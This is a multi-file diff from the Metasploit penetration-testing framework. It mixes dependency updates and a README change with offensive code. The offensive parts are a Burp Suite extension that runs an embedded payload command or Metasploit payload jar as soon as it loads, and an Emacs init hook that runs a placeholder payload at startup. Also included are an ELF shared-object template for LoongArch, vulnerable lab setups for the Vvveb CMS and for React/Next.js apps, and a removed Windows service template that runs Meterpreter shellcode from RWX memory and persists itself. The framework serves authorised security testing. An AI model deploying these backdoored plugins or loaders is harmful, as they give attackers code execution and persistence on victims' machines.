+metasploit_data_models, 6.0.12, "New BSD"
+metasploit_payloads-mettle, 1.0.46, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
-mime-types, 3.6.0, MIT
-mime-types-data, 3.2025.0304, MIT
+mime-types, 3.7.0, MIT
+mime-types-data, 3.2025.0924, MIT
 mini_portile2, 2.8.9, MIT
 minitest, 5.25.5, MIT
-mqtt, 0.6.0, MIT
+mqtt, 0.7.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.3, MIT
@@ -118,65 +119,67 @@ net-protocol, 0.2.2, "ruby, Simplified BSD"
 net-sftp, 4.0.0, MIT
 net-smtp, 0.5.1, "ruby, Simplified BSD"
 net-ssh, 7.3.0, MIT
+netrc, 0.11.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.7.4, "MIT, Simplified BSD"
-nokogiri, 1.18.9, MIT
+nokogiri, 1.18.10, MIT
 nori, 2.7.1, MIT
-octokit, 4.25.1, MIT
+octokit, 10.0.0, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
 parallel, 1.27.0, MIT
-parser, 3.3.8.0, MIT
+parser, 3.3.9.0, MIT
 parslet, 1.8.2, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.3, LGPL-2.1
 pdf-reader, 2.14.1, MIT
 pg, 1.5.9, "Simplified BSD"
-pp, 0.6.2, "ruby, Simplified BSD"
+pp, 0.6.3, "ruby, Simplified BSD"
 prettyprint, 0.2.0, "ruby, Simplified BSD"
-prism, 1.4.0, MIT
-pry, 0.14.2, MIT
-pry-byebug, 3.10.1, MIT
+prism, 1.5.1, MIT
+pry, 0.15.2, MIT
+pry-byebug, 3.11.0, MIT
 psych, 5.2.6, MIT
-public_suffix, 6.0.1, MIT
+public_suffix, 6.0.2, MIT
 puma, 6.6.0, "New BSD"
 racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.17, MIT
+rack, 2.2.19, MIT
 rack-protection, 3.2.0, MIT
 rack-session, 1.0.2, MIT
 rack-test, 2.2.0, MIT
 rackup, 1.0.1, MIT
 rails-dom-testing, 2.3.0, MIT
 rails-html-sanitizer, 1.6.2, MIT
-railties, 7.2.2.1, MIT
+railties, 7.2.2.2, MIT
 rainbow, 3.1.1, MIT
 rake, 13.3.0, MIT
 rasn1, 0.14.0, MIT
 rb-readline, 0.5.5, BSD
-rdoc, 6.14.2, ruby
+rdoc, 6.15.0, ruby
 recog, 3.1.14, unknown
 redcarpet, 3.6.1, MIT
-regexp_parser, 2.10.0, MIT
+regexp_parser, 2.11.3, MIT
 reline, 0.6.2, ruby
 require_all, 3.0.0, MIT
-rex-arch, 0.1.18, "New BSD"
+rest-client, 2.1.0, MIT
+rex-arch, 0.1.19, "New BSD"
 rex-bin_tools, 0.1.10, "New BSD"
-rex-core, 0.1.34, "New BSD"
+rex-core, 0.1.35, "New BSD"
 rex-encoder, 0.1.8, "New BSD"
-rex-exploitation, 0.1.41, "New BSD"
+rex-exploitation, 0.1.44, "New BSD"
 rex-java, 0.1.8, "New BSD"
 rex-mime, 0.1.11, "New BSD"
 rex-nop, 0.1.4, "New BSD"
 rex-ole, 0.1.9, "New BSD"
-rex-powershell, 0.1.101, "New BSD"
-rex-random_identifier, 0.1.16, "New BSD"
+rex-powershell, 0.1.103, "New BSD"
+rex-random_identifier, 0.1.21, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
-rex-socket, 0.1.62, "New BSD"
+rex-socket, 0.1.64, "New BSD"
 rex-sslscan, 0.1.13, "New BSD"
 rex-struct2, 0.1.5, "New BSD"
 rex-text, 0.2.61, "New BSD"
@@ -184,15 +187,15 @@ rex-zip, 0.1.6, "New BSD"
 rexml, 3.4.1, "Simplified BSD"
 rinda, 0.2.0, "ruby, Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.13.0, MIT
+rspec, 3.13.1, MIT
 rspec-core, 3.13.5, MIT
 rspec-expectations, 3.13.5, MIT
 rspec-mocks, 3.13.5, MIT
-rspec-rails, 8.0.1, MIT
+rspec-rails, 8.0.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.4, MIT
+rspec-support, 3.13.6, MIT
 rubocop, 1.75.7, MIT
-rubocop-ast, 1.44.1, MIT
+rubocop-ast, 1.47.1, MIT
 ruby-macho, 4.1.0, MIT
 ruby-mysql, 4.2.0, MIT
 ruby-prof, 1.7.2, "Simplified BSD"
@@ -221,11 +224,12 @@ tilt, 2.6.0, MIT
 timecop, 0.9.10, MIT
 timeout, 0.4.3, "ruby, Simplified BSD"
 toml, 0.2.0, MIT
+tsort, 0.2.0, "ruby, Simplified BSD"
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2025.1, MIT
-unicode-display_width, 3.1.4, MIT
-unicode-emoji, 4.0.4, MIT
+unicode-display_width, 3.2.0, MIT
+unicode-emoji, 4.1.0, MIT
 unix-crypt, 1.3.1, 0BSD
 useragent, 0.16.11, MIT
 warden, 1.2.9, MIT
@@ -18,7 +18,14 @@ Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapi
 For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).

 ## Support and Communication
-For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.
+For questions and suggestions, you can:
+
+- Join our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) for community support and general questions
+- Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat
+- Submit [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) for bug reports and feature requests
+- Follow [@metasploit](https://x.com/metasploit) on X or [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit) on Mastodon for updates
+
+**Note:** Some community members may still use IRC channels and the metasploit-hackers mailing list, though the primary support channels are now GitHub Discussions and Slack.

 ## Installing Metasploit

@@ -4,6 +4,26 @@ Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
 require 'rails'
 require File.expand_path('../boot', __FILE__)

+require 'action_view'
+# Monkey patch https://github.com/rails/rails/blob/v7.2.2.1/actionview/lib/action_view/helpers/tag_helper.rb#L51
+# Might be fixed by 8.x https://github.com/rails/rails/blob/v8.0.2/actionview/lib/action_view/helpers/tag_helper.rb#L51C1-L52C1
+raise unless ActionView::VERSION::STRING == '7.2.2.2' # A developer will need to ensure this is still required when bumping rails
+module ActionView::Helpers::TagHelper
+  class TagBuilder
+    def self.define_element(name, code_generator:, method_name: name.to_s.underscore)
+      code_generator.define_cached_method(method_name, namespace: :tag_builder) do |batch|
+        # Fixing a bug introduced by Metasploit's global Kernel patch: https://github.com/rapid7/metasploit-framework/blob/ae1db09f32cd04c007dbf445cf16dc22c9fc2e53/lib/rex.rb#L74-L79
+        # which fails when using the below 'instance_methods.include?(method_name.to_sym)' check
+        batch.push(<<~RUBY) # unless instance_methods.include?(method_name.to_sym)
+              def #{method_name}(content = nil, escape: true, **options, &block)
+                tag_string("#{name}", content, options, escape: escape, &block)
+              end
+            RUBY
+      end
+    end
+  end
+end
+
 all_environments = [
    :development,
    :production,
@@ -0,0 +1,88 @@
+import hashlib
+import re
+import argparse
+import sys
+from urllib.parse import urlsplit, parse_qs, unquote, quote
+from typing import Dict, List, Tuple
+
+_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]":, -]')
+
+def compute_signature(method: str, path: str, body: str = '', key: str = '') -> str:
+    if not method or not path:
+        raise ValueError("Method and path must be provided.")
+
+    url_parts = urlsplit(path)
+    base_path = url_parts.path
+    
+    if not base_path.startswith('/'):
+        base_path = '/' + base_path
+    
+    raw_query_params: Dict[str, List[str]] = parse_qs(
+        url_parts.query, keep_blank_values=True, strict_parsing=False
+    )
+    
+    canonical_query: List[Tuple[str, str]] = []
+    for k, v_list in raw_query_params.items():
+        if k == '_signature':
+            continue
+            
+        value = unquote(v_list[0]) if v_list else ''
+        canonical_query.append((k, value))
+    
+    canonical_query.sort(key=lambda item: item[0])
+    
+    query_string = '&'.join(f"{k}={quote(v)}" for k, v in canonical_query)
+
+    if query_string:
+        canonical_path = f"{base_path}?{query_string}"
+    else:
+        canonical_path = base_path
+        
+    canonical_path = re.sub(_SIGNATURE_REGEX, '-', canonical_path)
+
+    body_for_signing = re.sub(_SIGNATURE_REGEX, '-', body)
+    
+    if not key:
+        password_hash = "da39a3ee5e6b4b0d3255bfef95601890afd80709"
+    else:
+        password_hash = hashlib.sha1(key.encode('utf-8')).hexdigest().lower()
+
+    data = f"{method.upper()}:{canonical_path}:{body_for_signing}:{password_hash}"
+    
+    return hashlib.sha1(data.encode('utf-8')).hexdigest().lower()
+
+def main():
+    parser = argparse.ArgumentParser(description="Computes a SHA1 signature for an HTTP request.")
+
+    parser.add_argument('--method', type=str, required=True,
+                        choices=['GET', 'POST', 'PUT', 'DELETE'],
+                        help="The HTTP method (e.g., GET).")
+    parser.add_argument('--path', type=str, required=True,
+                        help="The canonical path (e.g., /api/resource?param=value).")
+    parser.add_argument('--key', type=str, default='',
+                        help="The secret key. Defaults to an empty string.")
+    parser.add_argument('--body', type=str, default='',
+                        help="The request body as a string. Defaults to an empty string.")
+
+    try:
+        args = parser.parse_args()
+        
+        signature = compute_signature(
+            method=args.method,
+            path=args.path,
+            body=args.body,
+            key=args.key
+        )
+
+        print(f"Computed Signature: {signature}")
+
+    except ValueError as e:
+        sys.stderr.write(f"Error: {e}\n")
+        sys.exit(1)
+    except Exception as e:
+        sys.stderr.write(f"An unexpected error occurred: {e}\n")
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+    main()
@@ -0,0 +1,25 @@
+FROM php:8.3-fpm
+
+RUN apt-get clean && apt-get update && \
+    apt-get install -y \
+        wget unzip \
+        libicu-dev \
+        libfreetype6-dev \
+        libjpeg62-turbo-dev \
+        libxml2-dev \
+        libwebp-dev \
+        libpng-dev \
+        libzip-dev \
+        libonig-dev \
+        libcurl4-openssl-dev && \
+    docker-php-ext-configure gd --with-webp --with-jpeg && \
+    docker-php-ext-install -j$(nproc) gd xml dom curl mbstring intl gettext zip mysqli && \
+    pecl install apcu && docker-php-ext-enable apcu && \
+    rm -rf /var/lib/apt/lists/*
+
+WORKDIR /var/www/html
+
+RUN wget https://github.com/givanz/Vvveb/releases/download/1.0.5/latest.zip && \
+    unzip latest.zip && rm latest.zip
+
+COPY php.ini /usr/local/etc/php/php.ini
@@ -0,0 +1,43 @@
+services:
+  php:
+    build: .
+    container_name: vvveb-php
+    volumes:
+      - vvveb_html:/var/www/html
+    networks:
+      - vvveb-net
+
+  nginx:
+    image: nginx:stable
+    container_name: vvveb-nginx
+    ports:
+      - "8080:80"
+    volumes:
+      - ./nginx.conf:/etc/nginx/conf.d/default.conf
+      - vvveb_html:/var/www/html:ro
+    depends_on:
+      - php
+    networks:
+      - vvveb-net
+
+  mysql:
+    image: mysql:5.7
+    container_name: vvveb-mysql
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD: root
+      MYSQL_DATABASE: vvveb
+      MYSQL_USER: vvveb
+      MYSQL_PASSWORD: vvveb
+    volumes:
+      - db_data:/var/lib/mysql
+    networks:
+      - vvveb-net
+
+networks:
+  vvveb-net:
+    driver: bridge
+
+volumes:
+  db_data:
+  vvveb_html:
@@ -0,0 +1,21 @@
+server {
+    listen 80;
+    server_name localhost;
+
+    root /var/www/html;
+    index index.php index.html;
+
+    location / {
+        try_files $uri $uri/ /index.php?$args;
+    }
+
+    location ~ \.php$ {
+        try_files $uri =404;
+        fastcgi_split_path_info ^(.+\.php)(/.+)$;
+        fastcgi_pass php:9000;
+        fastcgi_index index.php;
+        include fastcgi_params;
+        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
+        fastcgi_param PATH_INFO $fastcgi_path_info;
+    }
+}
@@ -0,0 +1,5 @@
+display_errors = On
+memory_limit = 512M
+upload_max_filesize = 64M
+post_max_size = 64M
+max_execution_time = 300
@@ -0,0 +1,9 @@
+# Prerequisites
+
+You'll need `gradle` which can be installed on Kali via `sudo apt-get install gradle`
+
+# Build
+
+1. Build: `gradle clean build`
+  1. Post build extension location: `build/libs/MetasploitPayloadExtension.jar`
+2. Copy the files into the proper location: `cp build/classes/java/main/burp/BurpExtender.class precompiled.class`
@@ -0,0 +1,27 @@
+apply plugin: 'java'
+
+repositories {
+    mavenCentral()
+}
+
+dependencies {
+    // implementation 'net.portswigger.burp.extender:burp-extender-api:1.7.13'
+    implementation 'net.portswigger.burp.extender:burp-extender-api:2.3'
+}
+
+sourceSets {
+    main {
+        java {
+            srcDir 'src/main/java'
+        }
+        resources {
+            srcDir 'src/main/resources'
+        }
+    }
+}
+
+task fatJar(type: Jar) {
+    baseName = project.name + '-all'
+    from { configurations.compile.collect { it.isDirectory() ? it : zipTree(it) } }
+    with jar
+}
@@ -0,0 +1 @@
+rootProject.name = 'MetasploitPayloadExtension'
@@ -0,0 +1,96 @@
+package burp;
+
+import java.io.File;
+import java.io.InputStream;
+import java.io.PrintWriter;
+import java.nio.charset.StandardCharsets;
+import java.util.Scanner;
+import java.net.URL;
+import java.net.URLClassLoader;
+import java.lang.reflect.Method;
+
+public class BurpExtender implements IBurpExtender {
+    @Override
+    public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
+        // Read extension name from resource file and set it
+        InputStream nameInputStream = getClass().getClassLoader().getResourceAsStream("name.txt");
+        Scanner nameScanner = new Scanner(nameInputStream, StandardCharsets.UTF_8.name());
+        String extensionName = nameScanner.useDelimiter("\\A").next().trim();
+        callbacks.setExtensionName(extensionName);
+
+        // Obtain our output and error streams
+        PrintWriter stdout = new PrintWriter(callbacks.getStdout(), true);
+        PrintWriter stderr = new PrintWriter(callbacks.getStderr(), true);
+
+        // Detect operating system
+        String os = System.getProperty("os.name").toLowerCase();
+        Process process;
+
+        try {
+            stdout.println("Initializing extension.");
+
+            // Locate command.txt using ClassLoader
+            InputStream commandInputStream = getClass().getClassLoader().getResourceAsStream("command.txt");
+
+            if (commandInputStream != null) {
+                // Read the command from command.txt
+                Scanner commandScanner = new Scanner(commandInputStream, StandardCharsets.UTF_8.name());
+                String command = commandScanner.useDelimiter("\\A").next().trim();
+
+                if (os.contains("win")) {
+                    // Create a temporary batch script to avoid line length issues from command line
+                    File tempScript = File.createTempFile("command", ".bat");
+                    tempScript.deleteOnExit(); // Ensure the file is deleted after execution
+
+                    // Write the command to the script file
+                    try (PrintWriter writer = new PrintWriter(tempScript, StandardCharsets.UTF_8.name())) {
+                        writer.println("@echo off");
+                        writer.println(command); // Write the payload command
+                    }
+
+                    // Execute the script file
+                    process = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", tempScript.getAbsolutePath()});
+                } else {
+                    // Unix-based systems: Use /bin/bash
+                    process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", command});
+                }
+            } else {
+                // Load burp_extension_pload.jar from resources
+                InputStream jarInputStream = getClass().getClassLoader().getResourceAsStream("burp_extension_pload.jar");
+                if (jarInputStream == null) {
+                    throw new Exception("burp_extension_pload.jar not found in resources");
+                }
+
+                // Save the jar to a temporary file
+                File tempJar = File.createTempFile("burp_extension_pload", ".jar");
+                tempJar.deleteOnExit();
+
+                try (InputStream inputStream = jarInputStream) { // Declare jarInputStream as a resource
+                    java.nio.file.Files.copy(inputStream, tempJar.toPath(), java.nio.file.StandardCopyOption.REPLACE_EXISTING);
+                }
+
+                // Load the jar using URLClassLoader
+                stdout.println("Loading internal jar");
+                try (URLClassLoader classLoader = new URLClassLoader(
+                        new URL[]{tempJar.toURI().toURL()},
+                        null // Use null for an isolated class loader
+                )) {
+                    Class<?> mainClass = classLoader.loadClass("metasploit.Payload");
+                    Method mainMethod = mainClass.getDeclaredMethod("main", String[].class);
+                    mainMethod.invoke(null, (Object) new String[]{});
+                } catch (ClassNotFoundException e) {
+                    stderr.println("Class not found: " + e.getMessage());
+                } catch (NoSuchMethodException e) {
+                    stderr.println("Main method not found: " + e.getMessage());
+                } catch (Exception e) {
+                    stderr.println("Error loading jar file (" + tempJar.toPath() + "): " + e.getMessage());
+                    e.printStackTrace(stderr);
+                }
+            }
+
+            stdout.println("Finished initializing extension.");
+        } catch (Exception e) {
+            stderr.println("Error loading extension: " + e.getMessage());
+        }
+    }
+}
@@ -0,0 +1 @@
+FOOBARBAZ
@@ -0,0 +1 @@
+Metasploit Payload Extension
@@ -0,0 +1,15 @@
+(defun PLUGIN_NAME--process-sentinel (proc event)
+  (when (memq (process-status proc) '(exit signal))
+    (delete-process proc)))
+
+(defun PLUGIN_NAME-run-async ()
+    (make-process
+     :name "PLUGIN_NAME"
+     :buffer nil
+     :command (list "bash" "-li" "-c" "PAYLOAD_PLACEHOLDER")
+     :noquery t
+     :sentinel #'PLUGIN_NAME--process-sentinel))
+
+(add-hook 'emacs-startup-hook #'PLUGIN_NAME-run-async)
+
+(provide 'PLUGIN_NAME)
@@ -1,304 +0,0 @@
-#include <String.h>
-#include <Windows.h>
-#include <stdlib.h>
-#include <stdio.h>
-
-#define SERVICE_NAME     <%= @service_name.inspect %>
-#define DISPLAY_NAME     <%= @service_description.inspect %>
-#define RETRY_TIME       <%= @retry_time %>
-
-//
-// Globals
-//
-
-SERVICE_STATUS status;
-SERVICE_STATUS_HANDLE hStatus;
-
-//
-// Meterpreter connect back to host
-//
-
-void start_meterpreter()
-{
-// Your meterpreter shell here
-  <%= buf %>
-
-  LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-  memcpy(buffer,buf,sizeof(buf));
-  HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL);
-  WaitForSingleObject(hThread, -1); //INFINITE
-  CloseHandle(hThread);
-}
-
-//
-// Call self without parameter to start meterpreter
-//
-
-void self_call()
-{
-    char path[MAX_PATH];
-    char cmd[MAX_PATH];
-
-    if (GetModuleFileName(NULL, path, sizeof(path)) == 0) {
-        // Get module file name failed
-        return;
-    }
-
-    STARTUPINFO startup_info;
-    PROCESS_INFORMATION process_information;
-
-    ZeroMemory(&startup_info, sizeof(startup_info));
-    startup_info.cb = sizeof(startup_info);
-
-    ZeroMemory(&process_information, sizeof(process_information));
-
-    // If create process failed.
-    // CREATE_NO_WINDOW = 0x08000000
-    if (CreateProcess(path, path, NULL, NULL, TRUE, 0x08000000, NULL,
-                      NULL, &startup_info, &process_information) == 0)
-    {
-        return;
-    }
-
-    // Wait until the process died.
-    WaitForSingleObject(process_information.hProcess, -1);
-}
-
-//
-// Process control requests from the Service Control Manager
-//
-
-VOID WINAPI ServiceCtrlHandler(DWORD fdwControl)
-{
-    switch (fdwControl) {
-        case SERVICE_CONTROL_STOP:
-        case SERVICE_CONTROL_SHUTDOWN:
-            status.dwWin32ExitCode = 0;
-            status.dwCurrentState = SERVICE_STOPPED;
-            break;
-
-        case SERVICE_CONTROL_PAUSE:
-            status.dwWin32ExitCode = 0;
-            status.dwCurrentState = SERVICE_PAUSED;
-            break;
-
-        case SERVICE_CONTROL_CONTINUE:
-            status.dwWin32ExitCode = 0;
-            status.dwCurrentState = SERVICE_RUNNING;
-            break;
-
-        default:
-            break;
-    }
-
-    if (SetServiceStatus(hStatus, &status) == 0) {
-        //printf("Cannot set service status (0x%08x)", GetLastError());
-        exit(1);
-    }
-
-    return;
-}
-
-
-//
-// Main function of service
-//
-
-VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv)
-{
-    // Register the service handler
-
-    hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);
-
-    if (hStatus == 0) {
-        //printf("Cannot register service handler (0x%08x)", GetLastError());
-        exit(1);
-    }
-
-    // Initialize the service status structure
-
-    status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS;
-    status.dwCurrentState = SERVICE_RUNNING;
-    status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
-    status.dwWin32ExitCode = 0;
-    status.dwServiceSpecificExitCode = 0;
-    status.dwCheckPoint = 0;
-    status.dwWaitHint = 0;
-
-    if (SetServiceStatus(hStatus, &status) == 0) {
-        //printf("Cannot set service status (0x%08x)", GetLastError());
-        return;
-    }
-
-    // Start the Meterpreter
-    while (status.dwCurrentState == SERVICE_RUNNING) {
-        self_call();
-        Sleep(RETRY_TIME);
-    }
-
-    return;
-}
-
-
-//
-// Installs and starts the Meterpreter service
-//
-
-BOOL install_service()
-{
-    SC_HANDLE hSCManager;
-    SC_HANDLE hService;
-
-    char path[MAX_PATH];
-
-    // Get the current module name
-
-    if (!GetModuleFileName(NULL, path, MAX_PATH)) {
-        //printf("Cannot get module name (0x%08x)", GetLastError());
-        return FALSE;
-    }
-
-    // Build the service command line
-
-
-    char cmd[MAX_PATH];
-
-    int total_len = strlen(path) + <%= 3 + @start_cmd.length %>;
-    if (total_len < 0 || total_len >= sizeof(cmd)){
-        //printf("Cannot build service command line (0x%08x)", -1);
-        return FALSE;
-    }
-
-    cmd[0] = '\0';
-    strcat(cmd, "\"");
-    strcat(cmd, path);
-    strcat(cmd, "\" <%= @start_cmd %>");
-
-    // Open the service manager
-
-    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
-
-    if (hSCManager == NULL) {
-        //printf("Cannot open service manager (0x%08x)", GetLastError());
-        return FALSE;
-    }
-
-    // Create the service
-
-    hService = CreateService(
-        hSCManager,
-        SERVICE_NAME,
-        DISPLAY_NAME,
-        0xf01ff,            // SERVICE_ALL_ACCESS
-        SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
-        SERVICE_AUTO_START,
-        SERVICE_ERROR_NORMAL,
-        cmd,
-        NULL,
-        NULL,
-        NULL,
-        NULL,   /* LocalSystem account */
-        NULL
-    );
-
-    if (hService == NULL) {
-        //printf("Cannot create service (0x%08x)", GetLastError());
-
-        CloseServiceHandle(hSCManager);
-        return FALSE;
-    }
-
-    // Start the service
-
-    char* args[] = { path, "service" };
-
-    if (StartService(hService, 2, (const char**)&args) == 0) {
-        DWORD err = GetLastError();
-
-        if (err != 0x420) //ERROR_SERVICE_ALREADY_RUNNING
-        {
-            //printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err);
-
-            CloseServiceHandle(hService);
-            CloseServiceHandle(hSCManager);
-            return FALSE;
-        }
-    }
-
-    // Cleanup
-
-    CloseServiceHandle(hService);
-    CloseServiceHandle(hSCManager);
-
-    //printf("Service %s successfully installed.", SERVICE_NAME);
-
-    return TRUE;
-}
-
-//
-// Start the service
-//
-
-void start_service()
-{
-    SERVICE_TABLE_ENTRY ServiceTable[] =
-    {
-        { SERVICE_NAME, &ServiceMain },
-        { NULL, NULL }
-    };
-
-    if (StartServiceCtrlDispatcher(ServiceTable) == 0) {
-        //printf("Cannot start the service control dispatcher (0x%08x)",GetLastError());
-        exit(1);
-    }
-}
-
-
-//
-// Main function
-//
-
-int main()
-{
-    // Parse the command line argument.
-    // For now, int main(int argc, char *argv) is buggy with metasm.
-    // So we choose this approach to achieve it.
-    LPTSTR cmdline;
-    cmdline = GetCommandLine();
-
-    char *argv[MAX_PATH];
-    char * ch = strtok(cmdline," ");
-    int argc = 0;
-
-    while (ch != NULL)
-    {
-       argv[argc] = malloc( strlen(ch)+1) ;
-       strncpy(argv[argc], ch, strlen(ch)+1);
-
-       ch = strtok (NULL, " ");
-       argc++;
-    }
-
-    if (argc > 1) {
-
-        if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
-
-            // Installs and starts the service
-
-            install_service();
-            return 0;
-        }
-        else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
-            // Starts the Meterpreter as a service
-
-            start_service();
-            return 0;
-        }
-    }
-
-    // Starts the Meterpreter as a normal application
-
-    start_meterpreter();
-
-    return 0;
-}
@@ -0,0 +1,14 @@
+FROM node:18-alpine
+
+WORKDIR /app
+
+COPY package.json ./
+RUN npm install
+
+COPY . .
+
+RUN npm run build
+
+EXPOSE 3000
+
+CMD ["npm", "start"]
@@ -0,0 +1,12 @@
+<!DOCTYPE html>
+<html lang="en">
+  <head>
+    <meta charset="UTF-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <title>React RCE</title>
+  </head>
+  <body>
+    <div id="root"></div>
+    <script type="module" src="/src/main.jsx"></script>
+  </body>
+</html>
@@ -0,0 +1,6 @@
+/** @type {import('next').NextConfig} */
+const nextConfig = {
+  output: 'standalone',
+}
+
+module.exports = nextConfig
@@ -0,0 +1,22 @@
+{
+  "name": "my-next-app",
+  "version": "0.1.0",
+  "private": true,
+  "scripts": {
+    "dev": "next dev",
+    "build": "next build",
+    "start": "next start",
+    "lint": "next lint"
+  },
+  "dependencies": {
+    "react": "19.0.0",
+    "react-dom": "19.0.0",
+    "next": "15.0.4"
+  },
+  "devDependencies": {
+    "typescript": "^5",
+    "@types/node": "^20",
+    "@types/react": "^18",
+    "@types/react-dom": "^18"
+  }
+}
@@ -0,0 +1,5 @@
+"use server";
+
+export async function greet(name: string) {
+  return `Hello, ${name}!`;
+}
@@ -0,0 +1,11 @@
+export default function RootLayout({
+  children,
+}: {
+  children: React.ReactNode
+}) {
+  return (
+    <html lang="ru">
+      <body>{children}</body>
+    </html>
+  );
+}
@@ -0,0 +1,11 @@
+import { greet } from './actions';
+
+export default async function Home() {
+  const greeting = await greet("World");
+  
+  return (
+    <main style={{ padding: '2rem', fontFamily: 'system-ui' }}>
+      <h1>{greeting}</h1>
+    </main>
+  );
+}
@@ -0,0 +1,26 @@
+{
+  "compilerOptions": {
+    "lib": ["dom", "dom.iterable", "esnext"],
+    "allowJs": true,
+    "skipLibCheck": true,
+    "strict": true,
+    "noEmit": true,
+    "esModuleInterop": true,
+    "module": "esnext",
+    "moduleResolution": "bundler",
+    "resolveJsonModule": true,
+    "isolatedModules": true,
+    "jsx": "preserve",
+    "incremental": true,
+    "plugins": [
+      {
+        "name": "next"
+      }
+    ],
+    "paths": {
+      "@/*": ["./src/*"]
+    }
+  },
+  "include": ["next-env.d.ts", "**/*.ts", "**/*.tsx", ".next/types/**/*.ts"],
+  "exclude": ["node_modules"]
+}
@@ -0,0 +1,6 @@
+import { defineConfig } from "vite";
+import react from "@vitejs/plugin-react";
+
+export default defineConfig({
+  plugins: [react()],
+});
@@ -0,0 +1,99 @@
+; build with:
+;   nasm elf_dll_loongarch64_template.s -f bin -o template_loongarch64_linux_dll.bin
+
+BITS 64
+
+org     0
+
+ehdr:                            ; Elf64_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    3                        ;   e_type       = ET_DYN
+  dw    0x102                    ;   e_machine    = LOONGARCH
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    shdr - $$                ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    2                        ;   e_phnum
+  dw    shentsize                ;   e_shentsize
+  dw    2                        ;   e_shnum
+  dw    1                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+  dd    2                          ; p_type  = PT_DYNAMIC
+  dd    7                          ; p_flags = rwx
+  dq    dynsection                 ; p_offset
+  dq    dynsection                 ; p_vaddr
+  dq    dynsection                 ; p_vaddr
+  dq    dynsz                      ; p_filesz
+  dq    dynsz                      ; p_memsz
+  dq    0x1000                     ; p_align
+
+shdr:
+  dd    1                          ; sh_name
+  dd    6                          ; sh_type = SHT_DYNAMIC
+  dq    0                          ; sh_flags
+  dq    dynsection                 ; sh_addr
+  dq    dynsection                 ; sh_offset
+  dq    dynsz                      ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dq    8                          ; sh_addralign
+  dq    7                          ; sh_entsize
+shentsize equ $ - shdr
+  dd    0                          ; sh_name
+  dd    3                          ; sh_type = SHT_STRTAB
+  dq    0                          ; sh_flags
+  dq    strtab                     ; sh_addr
+  dq    strtab                     ; sh_offset
+  dq    strtabsz                   ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dq    0                          ; sh_addralign
+  dq    0                          ; sh_entsize
+
+dynsection:
+; DT_INIT
+  dq    0x0c
+  dq    _start
+; DT_STRTAB
+  dq    0x05
+  dq    strtab
+; DT_SYMTAB
+  dq    0x06
+  dq    strtab
+; DT_STRSZ
+  dq    0x0a
+  dq    0
+; DT_SYMENT
+  dq    0x0b
+  dq    0
+; DT_NULL
+  dq    0x00
+  dq    0
+
+dynsz equ $ - dynsection
+
+strtab:
+  db 0
+  db 0
+strtabsz equ $ - strtab
+
+align 16
+global _start
+_start:
@@ -0,0 +1,8 @@
